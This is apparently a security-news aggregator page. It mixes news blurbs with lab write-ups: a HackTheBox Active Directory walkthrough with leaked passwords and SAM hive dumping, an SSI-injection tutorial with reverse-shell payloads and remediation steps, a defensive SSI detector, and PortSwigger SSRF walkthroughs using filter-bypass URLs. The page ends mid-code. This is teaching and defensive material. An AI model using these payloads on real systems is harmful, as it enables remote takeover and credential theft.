smbclient \\\\cicada.htb\\HR -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 17:59:09 2024
.. D 0 Thu Mar 14 17:51:29 2024
Notice from HR.txt A 1266 Wed Aug 28 23:01:48 2024

Got something; let's get that file and see what is inside it. We got a password from the file: Cicada$M6Corpb*@Lp#nZp!8

Tried brute forcing with common credentials and the password obtained. Found a bunch of users, and michael.wrightson gave some results. We got a username and password: david.orelious:aRt$Lp#7t*VQ!3

smbclient \\\\cicada.htb\\DEV -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 18:01:39 2024
.. D 0 Thu Mar 14 17:51:29 2024
Backup_script.ps1 A 601 Wed Aug 28 22:58:22 2024

There is a file; when I opened it I again got a username and password: emily.oscars : Q!3@Lp#M6b*7t*Vt. Tried this combination with smbclient and smbmap. Since this is an Active Directory machine, I tried WinRM access with the credentials:

evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/26/2024 1:10 PM Administrator
d----- 8/22/2024 2:22 PM emily.oscars.CICADA
d-r--- 3/14/2024 3:45 AM Public

User.txt

We got the user flag in emily.oscars.CICADA > Desktop > user.txt. There is a directory named Administrator, but I don't have access to it. Privilege escalation needs to be done.

root.txt

Creating a directory named Temp in the C:\ drive and then using the Windows reg save command to dump the SAM (Security Account Manager) and SYSTEM registry hives into C:\Temp. The SAM hive contains password hashes of local user accounts, while the SYSTEM hive holds the encryption keys needed to decrypt those hashes. This is commonly used in privilege escalation attacks to extract credentials and perform Pass-the-Hash (PtH) attacks or offline cracking using tools like Mimikatz or Hashcat. However, executing this requires SYSTEM-level privileges, and without them you'll likely get an "Access Denied" error.

download sam
download system

Using pypykatz to extract password hashes from the dumped SAM and SYSTEM registry hives, we found the hash value for Administrator. Let's connect using the username and password.
by HACKLIDO
2025-02-17 08:12:18
A week in security (February 10 – February 16)A list of topics we covered in the week of February 10 to February 16 of 2025
by Malwarebytes Labs
2025-02-17 02:55:09
Get the best Wyze Cam alternative I've tested for only $20 through Presidents' DayThe Blink Mini 2 is a feature-rich security camera that you can get for $20. An extra $10 gets you a waterproof adapter that makes the deal that much sweeter.
by ZDNET Security
2025-02-17 00:33:07
Estonian spy chief: ‘Hybrid schmybrid, what’s happening is attacks’In a late panel discussion on Saturday at the Munich Security Conference, Kaupo Rosin protested the use of the word which has been applied to a range of hostile activities that are deemed to be deniable or below the threshold justifying an armed response.
by The Record
2025-02-16 18:03:50
Server-Side Includes (SSI): A Lesser-Known Exploit Vector

Server Side Includes (SSI) give developers a convenient way to build web pages dynamically. SSI lets a developer embed dynamic elements in HTML documents without advanced knowledge of server- or client-side programming. SSI can serve performance optimisation, but it also becomes a risk for exploitation whenever developers misconfigure it. This piece gives a dual view of SSI: as it affects developers and as it affects attackers. It analyses typical SSI commands, explains their unusual syntax, and discusses manipulation techniques that can have undesired consequences.

What Is SSI, Really?

With SSI, the server processes HTML comments that contain embedded special directives. Directives such as <!--#include--> and <!--#exec--> tell the server to carry out instructions before the HTML content is sent to the client. This design is dual-purpose: if SSI processing does not happen, the browser sees the unprocessed directives as ordinary comments and ignores them.

Lab

For the lab we use bee-box, an intentionally vulnerable VM that runs applications such as bWAPP on VMware. You can download the VM from here; feel free to use Google and YouTube for setup help. I tried other methods such as Docker, but the SSI injection lab had some errors there, and I personally find installing bee-box on VMware the easiest way to access this lab.

Breaking Down the SSI Directives

Let's walk through some practical examples and explain what each command does, why the syntax looks a bit "off," and what makes it a potential attack vector when exploited.

1. Viewing System Files

<!--#exec cmd="cat /etc/passwd"-->

Through its exec directive, this command instructs the server to run the shell command cat /etc/passwd. On Unix-like systems this file holds user account information. An attacker who succeeds in SSI injection could use it to read system data that a properly secured setup should never disclose. The directive sits inside an HTML comment, which looks as if it were there for documentation; the browser ignores HTML comments, yet a server configured to handle SSI executes the command. This structure is what lets SSI blend in with normal HTML.

Screenshot:

2. Listing Directory Contents

<!--#exec cmd="ls" -- >

Here the exec directive runs ls, which lists the files and directories in the current working directory. It is a simple way to learn what files are on the server. Notice the extra space and the way the closing tag is formatted (-- > instead of the standard -->). Attackers occasionally vary the syntax like this to evade simple pattern-based web application firewalls. Such tiny glitches can slip past detection while still being interpreted correctly by a vulnerable server.

Screenshot:

3. Echoing Environment Variables

SSI isn't just a command execution technique; it can also be used for information disclosure through environment variables. Consider these examples:

a. Document Name

<!--#echo var="DOCUMENT_NAME" -- >

This directive outputs the value of the DOCUMENT_NAME variable, usually the current file's name. It is useful for checking that SSI is working and for obtaining metadata about the file being processed.

Screenshot:

b. Last Modified Date

<!--#echo Var="LAST_MODIFIED" -->

Here echo retrieves the LAST_MODIFIED variable, showing when the file was last modified. This information lets both contributors and malicious individuals trace the file's history and the timeline of changes. Note the capitalised Var, another small syntax variation a server may still accept.

Screenshot:

c. Document URI

<!--#echo var="DOCUMENT_URI" -- >

This command echoes DOCUMENT_URI, the path of the file within the server. It is another way to learn the server's internal routing and naming scheme.

Screenshot:

4. Printing the Entire Environment

<!--#printenv -->

The printenv directive prints all environment variables present on the server. For an attacker this can be a treasure trove, because it returns information about the server configuration, down to secrets that may be stored in environment variables.

Screenshot:

5. Opening a Reverse Shell with Netcat

<!--#exec cmd="nc 192.168.1.9 443 -e /bin/sh" -->

This is where SSI becomes critical. The command attempts to open a shell back to a remote server at 192.168.1.9 port 443 using the Netcat (nc) utility: it connects to the attacker-controlled host at 192.168.1.9:443 and attaches the system shell /bin/sh to that connection. If the command executes successfully, the attacker gains interactive remote access.

Important Note: The command's output shows up on the web page instead of at the Netcat listener. The web server captures the script's STDOUT and displays it in the HTML response. A fully interactive reverse shell requires all input and output streams to be redirected properly. After running commands like pwd, whoami, and ls through the shell, you may see output like:

pwd
/var/www/bWAPP
whoami
www-data

And from the Netcat listener:

/var/www/bWAPP via ❯ sudo nc -lvnp 443
Listening on 0.0.0.0 443
ls
Connection received on 192.168.1.7 48389
ls
whoami
pwd

6. Crafting a Perl Reverse Shell

Attackers sometimes choose Perl because it gives more options for shaping reverse shell behaviour. Consider this payload:

<!--#exec cmd="perl -e 'use Socket;$i=\"192.168.1.9\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));while(<S>){system($_);}'" -->

The script opens a TCP connection to the attacker's IP and port and executes, on the server, the commands entered into the connection. Because it writes to STDOUT, its output may again appear on the web page.

The Fix: Redirecting I/O Correctly (failed attempt)

Getting a fully interactive Netcat shell requires explicitly redirecting the standard input, output and error streams.

<!--#exec cmd="perl -e 'use Socket;$i=\"192.168.1.9\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,\"<&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'" -->

Key Changes:

open(STDIN,"<&S");
open(STDOUT,">&S");
open(STDERR,">&S");

These calls redirect input, output and error to the socket connected to the Netcat listener, so output flows to your listener instead of back to the web page and the session becomes fully interactive. But this is real life, and not everything goes as expected: this breaks the web application and the payload does not execute as expected.

Screenshot of failed attempt:

7. Displaying the Local Date

<!--#echo var="DATE_LOCAL" -->

This command displays the server's local date and current time. Knowing the server's time settings helps an attacker synchronise activities and understand the environment better.

Screenshot:

Why Does the Syntax Look So Weird?

At first glance SSI directives can seem like a jumble of characters. There is a reason for this:

HTML Comment Wrapping: SSI embeds its directives in HTML comment syntax; the server recognises <!--#command--> as a directive. This structure ensures the browser skips the directive when the server does not process it.

Security Evasion: Attackers add spaces or change letter case to evade protection measures on the server. Such irregular formatting works against servers that lack proper security measures or adequate sanitisation.

Dual-Purpose Nature: Directives must stay valid HTML, so browsers ignore them, while remaining interpretable commands for the server. This dual role produces a syntax that sits between server commands and HTML.

Remediation: Securing Your Server Against SSI Vulnerabilities

Server-Side Includes offer a convenient way to include content dynamically, but they open up security risks if not properly managed. In Apache, SSI is typically configured through specific options and file extensions: files with the .shtml extension trigger the server to parse SSI directives embedded in HTML comments. If your site doesn't need SSI, or if you need to secure it against injection attacks, the following steps will help you disable or safely configure SSI. In this post we look at how to prevent this vulnerability on Apache and on IIS.

Disabling SSI in Apache

Method 1: Modify the Main Configuration File

Locate your configuration file. Apache's main configuration file lives in one of two places depending on the distribution:

/etc/httpd/conf/httpd.conf (CentOS/RedHat)
/etc/apache2/apache2.conf (Ubuntu/Debian)

Edit the file: open the configuration file in a text editor and find the <Directory> block for your website.

Disable SSI processing: add or update the directive

Options -Includes

This disables processing of SSI directives in that directory.

Restart Apache to apply the configuration change:

sudo systemctl restart apache2
# or
sudo service httpd restart

Method 2: Use a .htaccess File

Assume there is a directory /var/www/html/insecure-dir for which SSI is enabled. You can disable it as follows.

Navigate to the directory:

cd /var/www/html/insecure-dir

Create or edit the .htaccess file:

nano .htaccess

Add the following line:

Options -Includes

Save and exit. With this change, Apache will no longer process SSI directives in /insecure-dir.

Method 3: Remove SSI Handlers

If SSI is enabled only because of file extensions like .shtml, add the following line to the Apache configuration or a .htaccess file:

RemoveHandler .shtml

This stops Apache from applying server-side includes to files with that extension.

Disabling SSI in IIS

Method 1: Using IIS Manager

Open IIS Manager and choose your website in the left-hand pane. In the middle panel, double-click Handler Mappings. Find any handlers connected to Server-Side Includes and either right-click and choose "Remove", or select them and click "Disable".

Method 2: Edit the applicationHost.config File

The applicationHost.config file is commonly found at C:\Windows\System32\inetsrv\config\applicationHost.config.

Disable SSI globally: open the file as administrator and, within the <system.webServer> section, add or update:

<serverSideInclude ssiExecDisable="true" />

Save the file and restart IIS to apply the change.

Method 3: Disable Directory Browsing

In IIS Manager, double-click Directory Browsing for your site and set it to Off. This reduces the exposure of SSI-enabled files.

Conclusion

Server Side Includes speed up the development of dynamic web pages. Their functionality provides both advantages and, when security measures are absent, opportunities for attackers. Having explored SSI directives from simple variable echoes up to interactive shell commands, we can see both the practical benefit and the potential dangers of this technology. The lesson for developers is strict handling of user-controlled input combined with avoiding harmful SSI configurations. Protecting web infrastructure relies on a complete understanding of every element of the technology, including Server Side Includes, even though SSI was developed long ago. Taking proactive steps lets you preserve the benefits of dynamic content together with secure web application operation.
by HACKLIDO
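The directive variations catalogued in the post above (the `-- >` closing marker, the capitalised `Var=`, a missing space before `-->`) are exactly what a pattern-based filter tends to miss, and the remediation section ends on strict handling of user-controlled input. The following is an added example, not code from the post or from bee-box/bWAPP: a small Python detector that finds SSI-looking directives in untrusted input regardless of those variations, rates them by the element used, and shows the neutralisation step (HTML-escaping) that keeps the literal `<!--#` opener from ever reaching a server-parsed page. The sample inputs are constructed to mirror the post's directives.

```python
"""Detect SSI directives in untrusted input, tolerant of the syntax
variations discussed above. Added example code, not part of the original
post; all sample inputs below are constructed."""
import html
import re
from dataclasses import dataclass, field

# One directive: "<!--", optional whitespace, "#", the element name, its
# attributes, then "--" followed by optional whitespace and ">".  Apache's
# own parser is stricter than this; a detector should be deliberately looser.
DIRECTIVE_RE = re.compile(
    r"<!--\s*#\s*(?P<element>[a-z]+)(?P<attrs>.*?)--\s*>",
    re.IGNORECASE | re.DOTALL,
)
# name="value" pairs; backslash escapes inside the value are consumed so a
# payload like cmd="perl -e '...\"tcp\"...'" is captured as one value.
ATTR_RE = re.compile(
    r'(?P<name>[a-z_]+)\s*=\s*"(?P<value>(?:[^"\\]|\\.)*)"', re.IGNORECASE
)
# Severity by element, following the post: exec runs shell commands,
# include pulls in files, echo/printenv disclose server environment data.
SEVERITY = {"exec": "critical", "include": "high",
            "echo": "medium", "printenv": "medium"}


@dataclass
class SsiFinding:
    element: str
    attrs: dict = field(default_factory=dict)
    severity: str = "low"
    raw: str = ""


def find_ssi_directives(text: str) -> list[SsiFinding]:
    """Return every SSI-looking directive in *text* with parsed attributes.
    Element and attribute names are lower-cased so Var= and var= compare equal."""
    findings = []
    for m in DIRECTIVE_RE.finditer(text):
        element = m.group("element").lower()
        attrs = {a.group("name").lower(): a.group("value")
                 for a in ATTR_RE.finditer(m.group("attrs"))}
        findings.append(
            SsiFinding(element, attrs, SEVERITY.get(element, "low"), m.group(0))
        )
    return findings


def neutralize(text: str) -> str:
    """Make user input safe to embed in a server-parsed page: escaping '<'
    means mod_include can never see the literal '<!--#' opener."""
    return html.escape(text, quote=True)


# Constructed samples modelled on the directives shown in the post.
SAMPLES = {
    "passwd":   '<!--#exec cmd="cat /etc/passwd"-->',      # no space before -->
    "ls_space": '<!--#exec cmd="ls" -- >',                 # split closing marker
    "var_case": '<!--#echo Var="LAST_MODIFIED" -->',       # capitalised attribute
    "printenv": '<!--#printenv -->',                       # element, no attributes
    "perl":     '<!--#exec cmd="perl -e \'use Socket;$i=\\"192.168.1.9\\";\'" -->',
    "benign":   '<!-- plain HTML comment, no directive -->',
}


def scan_samples() -> dict[str, list[str]]:
    """Map each sample name to the 'element:severity' strings found in it."""
    return {name: [f"{f.element}:{f.severity}" for f in find_ssi_directives(s)]
            for name, s in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:9} -> {hits or 'clean'}")
    # After neutralisation the same input no longer contains any directive.
    print(neutralize(SAMPLES["passwd"]))
```

Treat a hit as a reason to reject or log the request, not as a signal to "clean" the directive out of the string: removal-based filters are what the spacing and case tricks are designed to defeat, while escaping leaves nothing for mod_include to parse.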
2025-02-16 14:29:43
Storm-2372 used the device code phishing technique since August 2024Russia-linked group Storm-2372 used the device code phishing technique since Aug 2024 to steal login tokens from governments, NGOs, and industries. Microsoft Threat Intelligence researchers warn that threat actor Storm-2372, likely linked to Russia, has been targeting governments, NGOs, and various industries across multiple regions since August 2024. The attackers employ a phishing technique called […]
by Security Affairs
2025-02-15 15:56:00
Android's New Feature Blocks Fraudsters from Sideloading Apps During CallsGoogle is working on a new security feature for Android that blocks device owners from changing sensitive settings when a phone call is in progress. Specifically, the in-call anti-scammer protections include preventing users from turning on settings to install apps from unknown sources and granting accessibility access. The development was first reported by Android Authority. Users who attempt
by The Hacker News
2025-02-15 15:00:00
What is an encryption backdoor?Talk of backdoors in encrypted services is once again doing the rounds after reports emerged that the U.K. government is seeking to force Apple to open up iCloud’s end-to-end encrypted (E2EE) device backup offering. Officials were said to be leaning on Apple to create a “backdoor” in the service that would allow state actors to […]
by TechCrunch
2025-02-15 11:30:00
The Official DOGE Website Launch Was a Security MessPlus: Researchers find RedNote lacks basic security measures, surveillance ramps up around the US-Mexico border, and the UK ordering Apple to create an encryption backdoor comes under fire.
by WIRED Security News
2025-02-15 03:07:33
Top US Election Security Watchdog Forced to Stop Election Security WorkThe US Cybersecurity and Infrastructure Security Agency has frozen efforts to aid states in securing elections, according to an internal memo viewed by WIRED.
by WIRED Security News
2025-02-15 00:12:00
New “whoAMI” Attack Exploits AWS AMI Name Confusion for Remote Code ExecutionCybersecurity researchers have disclosed a new type of name confusion attack called whoAMI that allows anyone who publishes an Amazon Machine Image (AMI) with a specific name to gain code execution within the Amazon Web Services (AWS) account. "If executed at scale, this attack could be used to gain access to thousands of accounts," Datadog Security Labs researcher Seth Art said in a report
by The Hacker News
2025-02-14 23:58:00
Lazarus Group Deploys Marstech1 JavaScript Implant in Targeted Developer AttacksThe North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers. The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that's associated with a profile named "
by The Hacker News
2025-02-14 21:00:00
How can MSPs ensure their own cybersecurity?MSPs are at the leading edge of providing cybersecurity services. They provide and procure vital perimeter protections to most of their client as part of their service packages.
by Barracuda
2025-02-14 20:22:13
Mastering PowerShell Sleep for Script ManagementThis post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Why You Might Need to Pause or Delay in PowerShell Scripts The Start-Sleep cmdlet in PowerShell pauses the execution of a script and waits for a specified amount of time. Strategically using pauses can help ensure smooth functionality and prevent errors, especially in scripts that depend on external systems or events. Here are three of … Continued
by Netwrix
2025-02-14 20:07:07
Emulating the Financially Motivated Criminal Adversary FIN7 – Part 2AttackIQ has released two new attack graphs that emulate the behaviors exhibited by the long-standing, financially motivated Russian criminal adversary known as FIN7 based on activities observed between 2022 and 2023. The post Emulating the Financially Motivated Criminal Adversary FIN7 – Part 2 appeared first on AttackIQ.
by AttackIQ
2025-02-14 18:29:21
This Security Firm's 'Bias' Is Also Its SuperpowerCredible Security's founders bring their varied experiences to help growing companies turn trust into a strategic advantage.
by Dark Reading
2025-02-14 18:24:28
12 Million Zacks accounts leaked by cybercriminalA cybercriminal stole a reported 12 million data records on Zacks’ customers and clients.
by Malwarebytes Labs
2025-02-14 17:59:07
Meta confirms ‘Project Waterworth,’ a global subsea cable project spanning 50,000 kilometersBack in November, we broke the news that Meta — owner of Facebook, Instagram, and WhatsApp, with billions of users accounting for 10% of all fixed and 22% of all mobile traffic — was close to announcing work on a major new, $10 billion+ subsea cable project to connect up the globe. The aim was […]
by TechCrunch
2025-02-14 16:55:58
ClearML and Nvidia vulnsCisco Talos’ Vulnerability Discovery & Research team recently disclosed two vulnerabilities in ClearML and four vulnerabilities in Nvidia. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.   For Snort
by Cisco Talos Blog
2025-02-14 16:53:02
Hackers Use Device Code Phishing to Hijack Microsoft 365 AccountsA newly discovered phishing campaign targeting Microsoft 365 accounts has been attributed to Russian-linked threat actors, leveraging an advanced technique known as device code authentication phishing. Reports from both Microsoft and cybersecurity firm Volexity indicate that multiple groups have been exploiting this method since mid-2024, targeting government agencies, NGOs, defense organizations, and private companies across … The post Hackers Use Device Code Phishing to Hijack Microsoft 365 Accounts appeared first on CyberInsider.
by Cyber Insider
2025-02-14 16:30:00
AI-Powered Social Engineering: Ancillary Tools and TechniquesSocial engineering is advancing fast, at the speed of generative AI. This is offering bad actors multiple new tools and techniques for researching, scoping, and exploiting organizations. In a recent communication, the FBI pointed out: ‘As technology continues to evolve, so do cybercriminals' tactics.’ This article explores some of the impacts of this GenAI-fueled acceleration. And examines what
by The Hacker News
2025-02-14 16:08:19
Chinese Hackers Breach Cisco Devices in Global Telecom AttacksA newly uncovered cyber espionage campaign led by the Chinese state-sponsored hacking group Salt Typhoon (Red Mike) has compromised vulnerable Cisco devices worldwide, targeting telecommunications providers across multiple countries, including the United States, the United Kingdom, and South Africa. The attack exploits two critical privilege escalation vulnerabilities, CVE-2023-20198 and CVE-2023-20273, found in Cisco IOS XE … The post Chinese Hackers Breach Cisco Devices in Global Telecom Attacks appeared first on CyberInsider.
by Cyber Insider
2025-02-14 15:57:00
Microsoft: Russian-Linked Hackers Using 'Device Code Phishing' to Hijack AccountsMicrosoft is calling attention to an emerging threat cluster it calls Storm-2372 that has been attributed to a new set of cyber attacks aimed at a variety of sectors since August 2024. The attacks have targeted government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas
by The Hacker News
2025-02-14 15:47:00
RansomHub Becomes 2024’s Top Ransomware Group, Hitting 600+ Organizations GloballyThe threat actors behind the RansomHub ransomware-as-a-service (RaaS) scheme have been observed leveraging now-patched security flaws in Microsoft Active Directory and the Netlogon protocol to escalate privileges and gain unauthorized access to a victim network's domain controller as part of their post-compromise strategy. "RansomHub has targeted over 600 organizations globally, spanning sectors
by The Hacker News
2025-02-14 15:00:00
How Banks Can Adapt to the Rising Threat of Financial CrimeBanking fraud and financial crimes are growing more sophisticated every day. By understanding the threats and building strong collaborations, banks can protect themselves and their clients.
by Dark Reading
2025-02-14 15:00:00
Open Source AI Models: Perfect Storm for Malicious Code, VulnerabilitiesCompanies pursuing internal AI development using models from Hugging Face and other open source repositories need to focus on supply chain security and checking for vulnerabilities.
by Dark Reading
2025-02-14 14:30:00
Salt Typhoon Exploits Cisco Devices in Telco InfrastructureThe China-sponsored state espionage group has exploited known, older bugs in Cisco gear for successful cyber intrusions on six continents in the past two months.
by Dark Reading
2025-02-14 14:12:53
New Research: Ransomware Data Extortion SkyrocketingData theft extortion attacks increased by 46% in the fourth quarter of 2024, according to a new report from Nuspire.
by KnowBe4
2025-02-14 14:09:42
An Overview of the MGM Cyber AttackThis post first appeared on blog.netwrix.com and was written by Dirk Schrader.If you have ever been to a Las Vegas casino, then you know that they are literally money-making machines as people bet money on a variety of games on a continuous basis. Modern casinos exemplify digitally transformed businesses, with customers engaging through multiple digital channels, from gaming systems to mobile apps and loyalty programs. The … Continued
by Netwrix
2025-02-14 14:06:00
Australia Imposes New Cyber Sanctions in Response to Medibank Private CyberattackThe government of Prime Minister Anthony Albanese has imposed additional cyber sanctions in response to the major 2022 cyberattack on Medibank Private. The breach, which compromised millions of customers' sensitive medical data, marked a turning point in Australia’s approach to cyber security. The Medibank Private cyberattack not only targeted the personal information of Medibank’s customers but also saw portions of the stolen data published on the dark web. It was one of Australia’s largest and most damaging cyber incidents, leaving millions of individuals with their personal and health information exposed. The attack was part of a growing trend of cybercriminal activity targeting Australian businesses, government systems, and critical infrastructure. In response, the Australian Government has taken a firm stand by introducing unprecedented cyber sanctions, marking the first time Australia has sanctioned an entity involved in facilitating cyberattacks. The Medibank Private Cyberattack and New Sanctions The new sanctions specifically target ZServers, a Russia-based network infrastructure provider that played a crucial role in the cyberattack. ZServers, along with five associated Russian cybercriminals, were identified as having provided the infrastructure that enabled the Medibank Private data breach. These individuals are: ZServers owner Aleksandr Bolshakov, and employees Aleksandr Mishin, Ilya Sidorov, Dmitriy Bolshakov, and Igor Odintsov. The Albanese Government says these actors not only facilitated the Medibank cyberattack but also provided services that supported a range of other malicious cyber activities, including ransomware operations associated with notorious cybercriminal groups like LockBit and BianLian. 
The sanctions, which have broad implications, make it a criminal offence for individuals or entities to engage with ZServers or its affiliated individuals. Australian law now imposes severe penalties, including imprisonment for up to 10 years and heavy fines, on those found guilty of providing assets to, or conducting any dealings with, these sanctioned entities. Additionally, the sanctions bar these cybercriminals from entering Australia, further reinforcing the country's commitment to securing its digital borders. Past Sanctions in Australia This latest round of sanctions follows a similar move in early 2024, when Aleksandr Ermakov was sanctioned for his alleged involvement in the Medibank cyberattack. The Albanese Government's response shows its resolve to deter cybercriminal activity and protect Australians from the devastating impacts of cybercrime. The implementation of the cyber sanctions is the result of extensive collaboration between various Australian agencies, including the Australian Signals Directorate (ASD), as well as international partners like the United States and the United Kingdom. This united front highlights the importance of global cooperation in the fight against cybercrime, with all parties working to identify, disrupt, and hold accountable the actors responsible for the Medibank Private cyberattack and other malicious online activities. Furthermore, these sanctions are a key component of Australia’s broader strategy to strengthen its cyber defences. The Albanese Government’s 2023-2030 Australian Cyber Security Strategy outlines the nation’s commitment to deterring cyber threats and holding cybercriminals accountable. By using sanctions as a tool, the government is ensuring that malicious cyber actors face serious consequences for their actions.
by The Cyber Express
2025-02-14 14:05:00
Top Six Most Dangerous Vulnerabilities in C and C++C and C++ programming are notorious for being bug-prone. Let’s look at the most dangerous software weaknesses in 2024 that are relevant for C and C++, so that you know what type of issues to test your code against in 2025.
by Code Intelligence
2025-02-14 14:00:58
More From Our Main Blog: The Good, the Bad and the Ugly in Cybersecurity – Week 7Police disrupt Phobos, 8Base and LockBit, Sarcoma ransomware targets PCB giant, and China-linked APTs use espionage tools in ransomware attacks. The post The Good, the Bad and the Ugly in Cybersecurity – Week 7 appeared first on SentinelOne.
by SentinelOne
2025-02-14 14:00:00
Searching for the cause of hung tasks in the Linux kernelThe Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state.
by Cloudflare
2025-02-14 14:00:00
Warning: Tunnel of Love Leads to ScamsRomance-baiting losses were up 40% last year, as more and more pig-butchering efforts crop up in the wild.
by Dark Reading
2025-02-14 14:00:00
4 ways to bring cybersecurity into your communityIt’s easy to focus on technology when talking about cybersecurity. However, the best prevention measures rely on the education of those who use technology. Organizations training their employees is the first step. But the industry needs to expand the concept of a culture of cybersecurity and take it from where it currently stands as an […] The post 4 ways to bring cybersecurity into your community appeared first on Security Intelligence.
by Security Intelligence
2025-02-14 13:35:42
Swipe Left on Scams: Cyber Experts Expose Valentine’s Day FraudstersThis week marks Valentine’s Day 2025! As the popularity of this romantic occasion has grown, so too have the cyber risks associated with dating, gift-giving, and online transactions. We have gathered insights from cybersecurity experts who share their thoughts on Valentine’s Day scams—from the threats facing love-struck consumers to the best practices for staying safe […] The post Swipe Left on Scams: Cyber Experts Expose Valentine’s Day Fraudsters appeared first on IT Security Guru.
by IT Security Guru
2025-02-14 13:00:23
Container security tools and their business benefits | Kaspersky official blogAssessing resource savings and productivity gains with systematic implementation of secure container development and IT transformation in hybrid clouds.
by Kaspersky
2025-02-14 12:47:27
Understanding Server-Side Request Forgery (SSRF)

Introduction: The Silent Threat Lurking in Your Web Applications

Imagine a vulnerability that lets an attacker reach into your internal network, read sensitive data, or even delete critical resources, all by manipulating a URL. This isn’t science fiction; it’s Server-Side Request Forgery (SSRF), one of the most underrated yet dangerous vulnerabilities in modern web applications. SSRF abuses the trust that servers place in one another, turning benign features like stock checkers or screenshot tools into weapons. In this post we dissect SSRF through hands-on labs and a real-world challenge, covering DNS rebinding, blacklist bypasses and open-redirect hijacking. Whether you are a bug bounty hunter, developer or security enthusiast, you will come away with actionable insight into exploiting, and defending against, these stealthy attacks.

Blackbox Testing

Lab 1: Basic SSRF against the local server
🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

After a few clicks in the lab we find a "Check stock" option. Unlike the other requests on the site, this one is interesting because it is a POST request whose stockApi parameter carries a URL. If we can change that URL to point at an internal resource, the site is vulnerable to SSRF. Open any product page, such as the one below, click "Check stock" and look at the POST request in Burp Suite:

    https://0a2500c90385725e849b7c4a00ad000c.web-security-academy.net/product?productId=1

Changing stockApi to either of the following returns the admin panel:

    http://localhost
    http://127.0.0.1

Now request /admin; with the "Pretty" view selected, the response shows the exact path for deleting the user carlos:

    http://localhost/admin
    http://127.0.0.1/admin

Requesting that endpoint deletes the user:

    http://localhost/admin/delete?username=carlos
    http://127.0.0.1/admin/delete?username=carlos

Click "Follow redirection" and, once the request has been sent, the lab is solved.

Lab 2: Basic SSRF against another back-end system
🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system

Here we are told that the admin interface listens on port 8080 on a host in the 192.168.0.X range. We could fuzz for other ports too, but the lab description asks us to find the last octet, so we load a number list from 1 to 255 into Intruder and fuzz that octet. The value 82 returns a 404, but despite the error the /admin panel is reachable there. Send the request to Repeater and access:

    http://192.168.0.82:8080/admin

From the admin panel, repeat the steps from the previous lab: select "Pretty", grab the link that deletes carlos, and request it:

    http://192.168.0.82:8080/admin/delete?username=carlos

As before we get a redirect; following it solves the lab.

Lab 3: SSRF with blacklist-based input filter
🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter

The lab starts like the previous ones, with the same stock-check POST request and stockApi parameter, but this time localhost and 127.0.0.1 are blacklisted. Such basic filters can be evaded with alternative spellings of the loopback address:

    http://127.1/
    http://2130706433/

The second is the decimal representation of the IPv4 address (sites like https://www.ipaddressguide.com/ip convert between the two forms). The decimal form usually works in CTFs, but in this lab it does not, so we go ahead with http://127.1 and get the admin panel. Requesting http://127.1/admin shows the option to delete carlos; select "Pretty" and grab the href.

If things were that simple there would be no fun, right? It turns out the string admin is blacklisted as well. Double-URL-encoding the letter a of admin as %25%36%31 (which decodes to %61 on the first pass and to a on the second) gets past the filter, so the final payload for the internal resource is:

    http://127.1/%25%36%31dmin/delete?username=carlos

Setting stockApi to that URL returns a redirect, and following it solves the lab.

Lab 4: SSRF with filter bypass via open redirection vulnerability
🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection

Each product page has a "Next product" link at the bottom; clicking it issues this GET request:

    /product/nextProduct?currentProductId=2&path=/product?productId=3

The endpoint answers with a 302 to whatever path says; here it sends us to /product?productId=3. Replace the path value with an arbitrary URL and the redirect still follows it, so the endpoint is an open redirect. The stock checker only accepts paths on its own host, but it follows redirects, so we hand it the open redirect and let that endpoint make the jump to the internal host:

    stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin

In the response, the admin page source contains the link that deletes carlos, so the final payload becomes:

    stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

With this the lab is solved. This was a real out-of-the-box situation: the trick is to notice that a redirect issued by a trusted, in-scope endpoint is accepted where an external URL is not, and to chain the "next product" feature into the stock checker. It opened the door to crafting new parameters and approaching the problem from a different angle.

Whitebox Testing

Baby Cached Web
🔗 Lab URL - https://app.hackthebox.com/challenges/baby%2520CachedView

Overview of the Challenge

In this challenge we examine a Flask web application with two main endpoints:

/cache: accepts a URL via a JSON POST request, loads the page in a headless browser (Selenium with Firefox), takes a screenshot and caches the image.
/flag: returns a secret flag image, but only to requests that come from localhost.

At first glance the application looks secure, because it enforces the following checks (see CachedWeb/web_cached_web/challenge/application/util.py).

URL Scheme Check. Only http and https URLs are accepted:

    if scheme not in ['http', 'https']:
        return flash('Invalid scheme', 'danger')

Internal IP Check. The application resolves the domain with socket.gethostbyname and rejects the result if its network prefix matches 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 or 0.0.0.0/8 (note that the link-local range used by cloud metadata services, 169.254.0.0/16, is not on the list):
    def ip2long(ip_addr):
        return struct.unpack('!L', socket.inet_aton(ip_addr))[0]

    def is_inner_ipaddress(ip):
        ip = ip2long(ip)
